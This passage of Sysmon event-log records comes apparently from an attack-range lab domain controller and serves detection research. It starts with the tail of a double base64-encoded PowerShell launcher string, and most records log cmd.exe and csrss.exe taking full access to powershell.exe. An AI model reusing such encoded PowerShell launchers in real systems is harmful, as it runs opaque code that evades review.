AQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nSourceProcessId: 4360\r\nSourceThreadId: 4588\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-0010ADE40800}","SourceProcessId":"4360","SourceThreadId":"4588","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5554,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 